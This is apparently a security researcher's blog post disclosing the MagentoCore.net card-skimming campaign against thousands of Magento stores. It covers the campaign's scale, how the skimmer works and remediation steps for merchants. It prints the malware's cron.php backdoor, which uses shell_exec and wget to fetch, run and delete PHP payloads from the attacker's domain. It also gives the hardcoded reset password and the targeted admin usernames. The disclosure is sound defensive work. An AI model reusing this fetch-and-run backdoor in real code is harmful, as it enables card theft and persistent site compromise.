MagentoCore skimmer most aggressive to date
A single group is responsible for planting skimmers on 7339 individual stores in the last 6 months. The MagentoCore skimmer is now the most successful to date.
Update 2018-09-07: Because Google Chrome has added the campaign to its blocklist last Saturday, the skimmers are now rapidly replacing “magentocore.net” with “magento.name”. In the last 24h, they have updated at least 190 compromised stores.
Online skimming - your identity and card are stolen while you shop - has been around for a few years, but no campaign has been so prolific as the MagentoCore.net skimmer. In the last 6 months, the group has turned 7339 individual stores into zombie money machines, to the benefit of their illustrious masters.
The average recovery time is a few weeks, but at least 1450 stores have hosted the MagentoCore.net parasite during the full past 6 months.
The group hasn’t finished yet: new brands are hijacked at a pace of 50 to 60 stores per day over the last two weeks (source: daily scans of yours truly).
The victim list contains multi-million dollar, publicly traded companies, which suggests the malware operators make a handsome profit. But the real victims are eventually the customers, who have their card and identity stolen.
How it works
This script (backup) records keystrokes from unsuspecting customers and sends everything in real-time to the “magentocore.net” server, registered in Moscow.
The malware includes a recovery mechanism as well. In case of the Magento software, it adds a backdoor to
cron.php. That will periodically download malicious code, and, after running, delete itself, so no traces are left.
shell_exec("wget -c https://magentocore.net/clean.json -O ./app/code/core/clean.php 2>&1"); shell_exec("wget -c https://magentocore.net/clear.json -O ./app/code/core/clear.php 2>&1"); shell_exec("php ./app/code/core/clean.php 2>&1"); shell_exec("php ./app/code/core/clear.php 2>&1"); unlink('./app/code/core/clean.php'); unlink('./app/code/core/clear.php');
clean.json (backup) is PHP code that removes any competing malware from the site, searching for
clear.json (backup) changes the password of several common staff user names to
how1are2you3 (see below for list).
What you can do
If you are a merchant and found the MagentoCore.net skimmer in your store, this is the to-do list for your ops team / forensic investigator.
- Find the entry point: how could attackers gain unauthorized access in the first place? Analyse backend access logs, correlate with staff IP’s and typical working hours. If suspicious activity is recorded from staff IPs, it could be that a staff computer is infected with malware, or that the attacker has hijacked an authorized session.
- Find backdoors and unauthorized changes to your codebase. Usually there are a few, both in frontend/backend code and the database. My opensource Magento Malware Scanner can be useful here.
- Once you have established all means of unauthorized access, close them all at once.
- Implement secure procedures that cover timely patching, strong staff passwords etcetera. A good starting point.
If your team has little experience with forensic analysis, it generally pays off to hire a professional investigator. S/he will find the entry vector faster and perhaps more important, has a lower risk of leaving any undetected backdoors. One missed backdoor and you can start all over in a few weeks.
Admin user names
The MagentoCore malware will set the password to
how1are2you3 for the following admin accounts periodically:
1468177885 1470303373 a aborman acid admin01 admin1 admin123 admin5 adminhendra adminnew adminray admins adminu admin_bfei admin_ihfb afletcher ajen alexgvn123 alif ameendering Ameliaaa an anin48 anjeng anjeng12 Anr_01 ardyan as asdasd astroeh asu123 asuasu asulan123 Audi azer aziz Backup backup_35f69 badcc bangsat berandal bgades bgross biji bschlotter bwilson c0krek cahyodp camuv1653 casa cbaker cecun cevans cgcf cgreenfield cknobloch clayser ClayX404 cmorgan coco codex coq cruis cvanstryland cwarton d dalexander ddoine Death dede dedeganteng default123 defaults defaults01 defaut123 design developer dhsjcsc diablox Dian2206 dkelly dlc dmorgan dpender dsacks dstefan eCommerce edorr ehooser einlow ejameson ekennedy erik erobinson firstname.lastname@example.org family faqih212 FathurFreakz ferdi123 fikrihaikal3 forme frozen404 fwilde geizkayusuf gfd ggrav ghaz gigihmhd gladz gmr golix19 GolixGates1 google gustaman haydar haydra hell hiddenymouz hornetto hunter2 hydro Hysoka i ibizta iko indoxploit iniadmin irfan jaja jancok jancoks janderson jayzweed jbonnell jdragovich jefri JelexCrew jengel jhemphill jhogan jhult jmartin jockerdz jonson jtappe juancok katon kedaong kehise kenta khise khoogers kimak kimyounsin king kkruger kmagnan knap13 knelson Kontol900! kotack kuyas kwwilliams kwynia lalapo123 LastTouch lluethje localsystem Loic lthummagunta lucu m4tr1x madmax maganeto magento magento1 mageplas magsupport malang manggo manick masthio01 mcopa meldred Memekl3g17 mgonzalez mind mlaudenbach mlomo momo moza mperry mranupak mrsakso msas msf msivalingam mtrudell mturico mwaldner mwelbig mwendt nathan nbrouwer ncastelli neqyns13 ngentod ngentot123 nmccray nnordman noob novara nrussell nzero o omyo123 ouni owadmin pak paypal pbk7695K@ penggunalaya pikri policy pujasucipto putra7695K r0cky rami rctioke7 rcummings rdewolfe restuser revian29 rezafirdaus rezafirdaus2 rhaan Rieqy rieqyns13 rkm48 rmiller robert Root rseeker s sadmin samikom sav.admin saz sdunham semprol sgood sgoodman shansen shayer sheinz25 Shor7cut Sihdaunix sjohnson slackerc0de slamusga smolix soliro ss123 staff.develo stores stupid Support surya surya1 svandenheuve swhite sysadm sysadmiin sysadmin sysadmin1 sysmon system32 systemadmin systembackup T1KUS90T tadamec tae tamedeo tanderson task teastmond telgersma terserah tesdar test tfgh Thole129 tomhawk training tvanhouten ubehera ui upel666 uSer VHiden133 vpotter wajixz wawa wew ybickham youmisscry ywigaraa zadmin zaz ziko zxc zxcyou636 _admin gogle Nexcess